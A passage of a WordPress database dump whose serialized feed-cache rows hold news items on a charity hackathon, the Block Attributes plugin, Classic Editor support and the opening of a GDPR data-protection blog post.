href=\"https://vridhifoundation.org/\">https://vridhifoundation.org/</a>:&nbsp;</p>\n\n\n\n<a href=\"https://i0.wp.com/wordpressfoundation.org/content/uploads/2021/08/image-1.png?ssl=1\"><img /></a>A screenshot of the Vridhi Foundation website created by the do_action Karnataka 2021 team.\n\n\n\n<p><a href=\"https://profiles.wordpress.org/nsuresha/\">N Suresha</a> (project manager), along with Hussna Hussain (content writer) and <a href=\"https://www.linkedin.com/in/ucriyaz/?originalSubdomain=in\">UC Riyaz</a> (designer) built the website for Vridhi Foundation. <a href=\"https://profiles.wordpress.org/mkrndmane/\">Makarand Mane</a> helped with the multilingual translation plugin, the theme, and the required templates. <a href=\"https://profiles.wordpress.org/freewebmentor/\">Prem Tiwari</a> set up the site and provided technical support during the development, as well. Together, the team worked in synergy to burn the midnight oil and deliver the site for the non-profit, which formally launched the same in a function at their premises, on August 15th!&nbsp;</p>\n\n\n\n<a href=\"https://i1.wp.com/wordpressfoundation.org/content/uploads/2021/08/image.jpeg?ssl=1\"><img /></a>Representatives of the Vridhi Foundation at their website launch event on August 15, 2021\n\n\n\n<p>Since representatives of Luv Kush foster home were out of the country during the hackathon,&nbsp; they couldn’t collaborate to give the content and the photos for the website. Most of the technical groundwork for their website is done, and it will formally be launched once the non-profit provides content for the teams.&nbsp;</p>\n\n\n\n<p>The hackathon would not be possible without the support of our kind sponsors who provided hosting, domain names, WordPress plugins/themes, and post hackathon support guarantees for all the non-profits. A big thanks to all of them! Our sponsors include:</p>\n\n\n\n<ul><li><a href=\"https://givewp.com/\">Give WP</a> &#8211; Who kindly sponsored a premium license for their flagship donation plugin</li><li><a href=\"https://yoast.com/\">Yoast</a> &#8211; Who kindly sponsored a premium license for their SEO plugin</li><li><a href=\"https://themeisle.com/\">Themeisle</a> &#8211; Who provided premium licenses for their theme</li><li><a href=\"https://wpjobopenings.com/\">WP Job Openings</a> &#8211; Who provided a license for their job board plugin</li><li><a href=\"https://wpgenius.in/\">WPGenius</a> &#8211; Who provided a translation plugin, templates, and themes</li><li><a href=\"https://www.premtiwari.in/\">Prem Tiwari</a> &#8211; Who has offered post-hackathon tech support for non-profits</li><li><a href=\"https://bluehost.in/\">Bluehost India</a> &#8211; Who provided hosting and domain names for all three non-profits</li></ul>\n\n\n\n<p>In addition to our sponsors, I wish to thank all stakeholders who helped make our event a grand success — especially our team of passionate volunteers and organizers who battled several personal challenges and a global pandemic to build an ever-lasting online presence for non-profits. Special thanks to the WordPress Foundation for supporting these do_action charity hackathons which empower non-profits across the globe, especially in these tough times.</p>\n\n\n\n<p>As we were wrapping up the event on the final day of the hackathon, I asked our team of organizers and volunteers one question: “Despite all the challenges, would you do this again?” They all answered in one resounding voice: “YES!” <img src=\"https://s.w.org/images/core/emoji/13.1.0/72x72/1f642.png\" alt=\"?\" class=\"wp-smiley\" />&nbsp;</p>\n\n\n\n<p><em>On behalf of the do_action Karnataka 2021 Organizing team,<br /><a href=\"https://profiles.wordpress.org/yoga1103\">Yogesh Londhe</a></em></p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<blockquote class=\"wp-block-quote\"><p>Feeling inspired, already? You can use WordPress for social good, by organing a <a href=\"https://doaction.org/\">do_action charity hackathon</a> in your own city! Check out <a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/event-formats/do_action-charity-hackathon/\">our handbook</a> for more information. It just takes five minutes to <a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/event-formats/do_action-charity-hackathon/do_action-event-application/\">fill out the application form</a>. So why wait? <a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/event-formats/do_action-charity-hackathon/do_action-event-application/\">Apply now</a>!</p></blockquote>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 27 Aug 2021 05:45:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Yogesh Londhe\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: Adding Custom HTML Attributes With the Block Attributes Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=121857\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:189:\"https://wptavern.com/adding-custom-html-attributes-with-the-block-attributes-plugin?utm_source=rss&utm_medium=rss&utm_campaign=adding-custom-html-attributes-with-the-block-attributes-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3791:\"<p class=\"has-drop-cap\">Earlier this week, websevendev released its fourth WordPress plugin to the official directory named <a href=\"https://wordpress.org/plugins/attributes-for-blocks/\">Block Attributes</a>. The extension allows end-users to add any HTML attribute to nearly any block.</p>\n\n\n\n<p>One of the problems with the WordPress editor is that it can be a bit fussy about customizing HTML. Blocks are built on a set of standards, and the markup is supposed to meet those expectations. If something does not fit, users see an invalid markup warning.</p>\n\n\n\n<p>However, there are times when users need to drop in a custom HTML attribute for various reasons. For example, I sometimes need to add a custom <code>data-</code> attribute for working with a bit of JavaScript. Since I know my way around code well enough, I typically write out the HTML in those situations via the Custom HTML block. But, that does not make sense when minor attribute additions are called for.</p>\n\n\n\n<p>WordPress currently allows users to add classes and IDs (called an &ldquo;HTML anchor&rdquo; in the admin) to almost every block. It does not allow for direct input of the dozens of other possible attributes that HTML supports. The use cases for the average user are few and far between.</p>\n\n\n\n<p>For those scenarios where some users could use the extra feature, the Block Attributes plugin is handy.</p>\n\n\n\n<p>The plugin is straightforward to use. It adds a new field named &ldquo;Additional attributes&rdquo; under the Advanced tab of every block. Users can add the attribute name and click the &ldquo;Add&rdquo; button. From there, it creates a new field for adding the attribute value.</p>\n\n\n\n<img />Adding an <code>onclick</code> attribute to a Button block.\n\n\n\n<p>The plugin also supports multiple attributes. Once you add one, you simply use the same input field to create more.</p>\n\n\n\n<p>For my first test drive, I added a simple <code>onclick</code> attribute with a value of <code>myFunction()</code>. Then, I hopped over to my theme and created that function via JavaScript to output a simple message in the console. Everything looked good under the hood, and it worked.</p>\n\n\n\n<ul><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li></ul>HTML view and console with custom JS for a Button block.\n\n\n\n<p>Most of the use cases I have in mind are for integrating with JavaScript, and this was a simple example of what is possible. There are far more complex things a developer could do with such a feature. That is reason enough to keep this plugin in the toolbox &mdash; sometimes you need a wrench instead of a hammer.</p>\n\n\n\n<p>I could also see Block Attributes being used for adding ARIA attributes in other situations where it might aid accessibility.</p>\n\n\n\n<p>Users could add custom styles to a specific block via a <code>style</code> attribute with the plugin. However, unless this is a simple one-off, I would recommend against it. For more advanced use cases, <a href=\"https://wordpress.org/plugins/blocks-css/\">Blocks CSS</a> is a far more suitable plugin. It has a built-in syntax highlighter. Plus, a textarea is friendlier than a one-line text input box.</p>\n\n\n\n<p>The only downside to Block Attributes I have seen is upon deactivation. You will see the dreaded &ldquo;this block contains unexpected or invalid content&rdquo; message in the editor if you have added any custom attributes. The editor has managed to resolve any issues I have run into with the core blocks.</p>\n\n\n\n<img />Resolving block warning after deactivating plugin.\n\n\n\n<p>Deactivating the plugin should not affect the front-end output. Because the custom attributes are a part of the HTML markup, they will still be there. The error message should only show in the editor.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 26 Aug 2021 23:27:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WPTavern: WordPress Classic Editor Support Extended for at Least Another Year\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=121553\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:199:\"https://wptavern.com/wordpress-classic-editor-support-extended-for-at-least-another-year?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-classic-editor-support-extended-for-at-least-another-year\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7276:\"<p class=\"has-drop-cap\">Last week, I reached out to several members of the core WordPress committers to see if we could get an official word on whether <a href=\"https://wordpress.org/plugins/classic-editor/\">Classic Editor</a> support would continue beyond the mere months it seemingly had left to live. I received a semi-official answer but was asked to hold off on publishing for a more detailed and nuanced response.</p>\n\n\n\n<p>Earlier today, WordPress executive director Josepha Haden Chomposy <a href=\"https://wordpress.org/news/2021/08/an-update-on-the-classic-editor-plugin/\">announced the official decision</a>. It was just as expected. The WordPress project would continue supporting the Classic Editor plugin for a while longer.</p>\n\n\n\n<p>&ldquo;At the time, we promised to support the plugin through 2021 and adjust if needed as the deadline got closer,&rdquo; she wrote. &ldquo;After discussing this with Matt [Mullenweg], it&rsquo;s clear that continuing to support the plugin through 2022 is the right call for the project as well as the community.&rdquo;</p>\n\n\n\n<p>As of now, classic users have a one-year extension.</p>\n\n\n\n<p>However, the plugin will not suddenly stop working on December 31, 2022. That is merely the current deadline for the &ldquo;full support&rdquo; phase. It should continue working well beyond whatever date is set for that support window to close.</p>\n\n\n\n<p>Designer Mark Root-Wiley reached out to WP Tavern <a href=\"https://twitter.com/MRWweb/status/1427422379047743495\">via Twitter</a> last week, but others had been asking the same question for a while. For some, they needed to know if they could continue supporting specific client needs. For others, it was a bludgeon to use in conversations for all editor-related things. Whatever the reason, before today, the last word had been from a <a href=\"https://make.wordpress.org/core/2018/11/07/classic-editor-plugin-support-window/\">Make Core post in November 2018</a>.</p>\n\n\n\n<p>&ldquo;The Classic Editor plugin will be officially supported until December 31, 2021,&rdquo; wrote core contributor Gary Pendergast in that three-year-old announcement. It was a shock for many at the time, uncertain whether the new block system would meet their needs.</p>\n\n\n\n<p>While three years may have seemed like plenty of time to ditch the classic in favor of the modern WordPress editor, the current stats show that the project still has a few miles yet to go.</p>\n\n\n\n<p>Currently, there are over 5 million active installations of the Classic Editor plugin. I am still waiting for a more specific tally, but no one has provided an answer yet. At best, we think the counter turns over at 10+ million, so we can speculate on the floor and ceiling for possible usage.</p>\n\n\n\n<p>Active installs are not the entire picture either. For example, we have the plugin installed here at the Tavern for legacy reasons but do not use it in our day-to-day work. We can likely disable it altogether. <a href=\"https://wptavern.com/wordpress-telemetry-proposal-addresses-long-standing-privacy-concerns-as-gdpr-compliance-deadline-looms\">WordPress has no telemetry system</a> for tracking the usage of such features. While the install total will not always make the picture clear, the current number supports the push for continued maintenance.</p>\n\n\n\n<p>&ldquo;I think it&rsquo;s important to note that the plugin is not going anywhere,&rdquo; said core committer Jonathan Desrosiers. &ldquo;It will continue to be listed on the .ORG repository for the foreseeable future.&rdquo;</p>\n\n\n\n<p>He pointed out that understanding the next phase of the Classic Editor plugin meant looking into the level of effort required to support it since 2018. The overwhelming majority of the changes in that nearly three-year timeframe have come down to keeping up with:</p>\n\n\n\n<ul><li>Text changes.</li><li>Adjustments to prevent warnings/errors and promote consistency across supported PHP versions.</li><li>Changes to deprecated action/filter hook calls.</li></ul>\n\n\n\n<p>&ldquo;It&rsquo;s been almost three whole years, and the plugin has largely required very little maintenance to continue functioning, and the bulk of maintenance has been to limit warnings and notices in debug logs,&rdquo; he said.</p>\n\n\n\n<p>The goal of the Classic Editor plugin was to help ease the transition to the block editor. Thus far, there have been eight major WordPress releases since the switch in version 5.0.</p>\n\n\n\n<p>&ldquo;There&rsquo;s a theory called the diffusion of innovations that looks to explain how, why, and at what rate new technology spreads,&rdquo; said Desrosiers. &ldquo;It separates adopters into several groups based on when they are willing to take the jump: innovators, early adopters, early majority, late majority, and laggards. I truly think that we have seen a good portion of the late majority beginning to move towards using the block editor. This can also be confirmed by the plugin&rsquo;s install growth, which has been slowing and plateauing this year.&rdquo;</p>\n\n\n\n<p>He had expected the previous deadline to mark the next stage of the Classic Editor plugin, called the &ldquo;sunset&rdquo; phase. It would be a time when the WordPress project moved from full support to encouraging late adopters to transition to the current editor to get the plugin&rsquo;s numbers down.</p>\n\n\n\n<p>&ldquo;The context I gave previously shows that, until now, that the level of effort needed to keep the plugin working on newer versions of WP has been pretty minimal,&rdquo; said Desrosiers of the potential sunset phase. &ldquo;I expect that pattern to continue thanks to backward compatibility. If any security issues or major problems are encountered, they&rsquo;ll, of course, be fixed. Any incompatibilities with the plugin and newer versions of WP will be considered on a case by case basis, but little to no time will be put towards bug fixes.&rdquo;</p>\n\n\n\n<p>However, this sunset phase will have to wait. We will not see it until at least the current support window closes on December 31, 2022. WordPress project leaders will need to reevaluate the plugin&rsquo;s lifespan at that point.</p>\n\n\n\n<p>The other looming question would be whether core WordPress would move specific pieces of its system to the Classic Editor plugin, such as allowing custom post types to support the old editor or the meta box API.</p>\n\n\n\n<p>&ldquo;There are no plans at this time to move any of the underlying &lsquo;classic&rsquo; parts from core to the plugin,&rdquo; said Desrosiers. &ldquo;I&rsquo;m sure that removing these parts will be evaluated at some point in the future, but when that will be is not clear.&rdquo;</p>\n\n\n\n<p>Even when official Classic Editor support reaches a hard deadline, it does not mean such a traditional editing experience will cease to exist. Plugins like <a href=\"https://wordpress.org/plugins/disable-gutenberg/\">Disable Gutenberg</a> have promised longer lifespans than the initial support window, and other editor projects will undoubtedly arise if there is wide enough demand.</p>\n\n\n\n<p>&ldquo;The block editor has come a long way, and I encourage everyone that has not yet given it a second chance (late adopters) to do so,&rdquo; said Desrosiers. &ldquo;You may be pleasantly surprised.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 25 Aug 2021 19:56:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:8:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Wed, 22 Sep 2021 12:02:06 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Wed, 22 Sep 2021 11:45:10 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:9:\"HIT ord 2\";s:16:\"content-encoding\";s:2:\"br\";}}s:5:\"build\";s:14:\"20210126075719\";}','no'),(510245,'_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1632355327','no'),(510246,'_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1632312127','no'),(510247,'_transient_timeout_feed_e0061ca2fa5b884e483872aa34d3e7eb','1632355327','no'),(510248,'_transient_feed_e0061ca2fa5b884e483872aa34d3e7eb','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"UpdraftPlus\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://updraftplus.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WordPress\'s leading backup plugin - backup, restore and clone WordPress sites\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 14 Sep 2021 15:47:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wordpress.org/?v=5.7.3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:103:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"How to protect customer data and prevent GDPR breaches on your WordPress site\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/IYqI44wz3a8/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"https://updraftplus.com/how-to-protect-customer-data-and-prevent-gdpr-breaches-on-your-wordpress-site/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 10 Sep 2021 13:29:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:11:{i:0;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:19:\"all in one security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:6:\"breach\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:20:\"Easy Updates Manager\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:4:\"gdpr\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:5:\"guide\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:6;a:5:{s:4:\"data\";s:7:\"prevent\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:7;a:5:{s:4:\"data\";s:8:\"security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:8;a:5:{s:4:\"data\";s:4:\"stop\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:9;a:5:{s:4:\"data\";s:4:\"tips\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:10;a:5:{s:4:\"data\";s:9:\"wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://updraftplus.com/?p=1223203\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:834:\"<p>For UpdraftPlus’ own privacy policy and how we deal with GDPR, please go to the privacy centre. Up until the advent of the internet, the most a company would know about their customers was their names, address, maybe their purchase &#8230; <a href=\"https://updraftplus.com/how-to-protect-customer-data-and-prevent-gdpr-breaches-on-your-wordpress-site/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/how-to-protect-customer-data-and-prevent-gdpr-breaches-on-your-wordpress-site/\">How to protect customer data and prevent GDPR breaches on your WordPress site</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Melvin Braide\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:19010:\"<p><iframe loading=\"lazy\" title=\"How to protect customer data and prevent GDPR breaches on your WordPress site\" width=\"1080\" height=\"608\" src=\"https://www.youtube.com/embed/bEFyE9mDO6g?feature=oembed\"  allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe></p>\n<p><span style=\"font-weight: 400;\">For UpdraftPlus’ own privacy policy and how we deal with GDPR, please go to the </span><a href=\"https://updraftplus.com/data-protection-and-privacy-centre/\"><span style=\"font-weight: 400;\">privacy centre</span></a><span style=\"font-weight: 400;\">.</span></p>\n<p><span style=\"font-weight: 400;\">Up until the advent of the internet, the most a company would know about their customers was their names, address, maybe their purchase history and little more. Fast forward to 2021, and businesses have access to all aspects of a customer&#8217;s (or potential customer) interests, bank details, email addresses, hobbies, desires, passions and goals &#8211; as well as some very personal information that the potential customer might not even be aware they are sharing. While this information has allowed companies to better serve and market towards customers, if this treasure trove of personal data gets into the wrong hands, it can cause a major problem for all involved. </span></p>\n<p><span style=\"font-weight: 400;\">In this blog, we will discuss how to protect customer data and prevent GDPR breaches. But first it is important to define what a data breach is and what GDPR means. </span></p>\n<h4><b>What is a data breach? </b></h4>\n<p><span style=\"font-weight: 400;\">A data breach is an incident that allows outsiders or unauthorized personnel to access or obtain confidential information from a system, without the permission of the owner. </span><span style=\"font-weight: 400;\">While cybercriminals represent the most common threat to data protection, they aren’t the only culprits. Employees and coworkers can either </span><a href=\"https://www.kaspersky.com/resource-center/definitions/data-breach\"><span style=\"font-weight: 400;\">accidentally or maliciously share data with unauthorized persons</span></a><span style=\"font-weight: 400;\">, which can also result in a data breach. </span></p>\n<h4><b>What is GDPR? </b></h4>\n<p><span style=\"font-weight: 400;\">GDPR stands for general data protection regulation, and as the name implies, it is a regulation that addresses data protection and privacy. While GDPR applies to countries and companies operating with the EU, </span><a href=\"https://insights.comforte.com/13-countries-with-gdpr-like-data-privacy-laws\"><span style=\"font-weight: 400;\">countries all over the world</span></a><span style=\"font-weight: 400;\"> have similar GDPR-like policies in place.</span></p>\n<p><span style=\"font-weight: 400;\">In May 2018, </span><a href=\"https://www.superoffice.com/blog/gdpr/\"><span style=\"font-weight: 400;\">the EU implemented the GDPR</span></a><span style=\"font-weight: 400;\"> to ensure that citizens of the EU and EEA region have greater control over what personal information they allow access to, how that information is used and what assurances they have regarding the protection of that information by the companies involved. </span><span style=\"font-weight: 400;\">The GDPR directive stipulates that personal data includes name, IP address, banking details, email address, photo, location, or medical information. This regulation applies to every company with customers that are EU and EEA citizens. </span></p>\n<h2><b>10 ways to keep your customer subscription data safe and prevent GDPR breaches</b></h2>\n<p><span style=\"font-weight: 400;\">If a company finds itself victim of a data breach, it can find itself facing an expensive bill. Under GDPR guidelines, a company can face fines of up to </span><a href=\"https://www.gdpr.associates/data-breach-prevention/\"><span style=\"font-weight: 400;\">€</span><span style=\"font-weight: 400;\">20 million or 4% of their annual turnover</span></a><span style=\"font-weight: 400;\"> due to a breach. However, the following practices can drastically reduce your chances of experiencing a security breach. </span></p>\n<h4><b>1. Only collect essential data </b></h4>\n<p><span style=\"font-weight: 400;\">Your company’s database should consist of only information that is crucial to your marketing efforts. The more personal the information that is obtained from customers, the more valuable they will be to hackers and cybercriminals.  </span></p>\n<p><span style=\"font-weight: 400;\">A crucial part of </span><a href=\"https://www.zendesk.com/blog/8-ways-effectively-manage-customer-data/\"><span style=\"font-weight: 400;\">customer data management</span></a><span style=\"font-weight: 400;\"> is deciding which data you should collect and what you don’t need. Between </span><a href=\"https://go.forrester.com/blogs/hadoop-is-datas-darling-for-a-reason/\"><span style=\"font-weight: 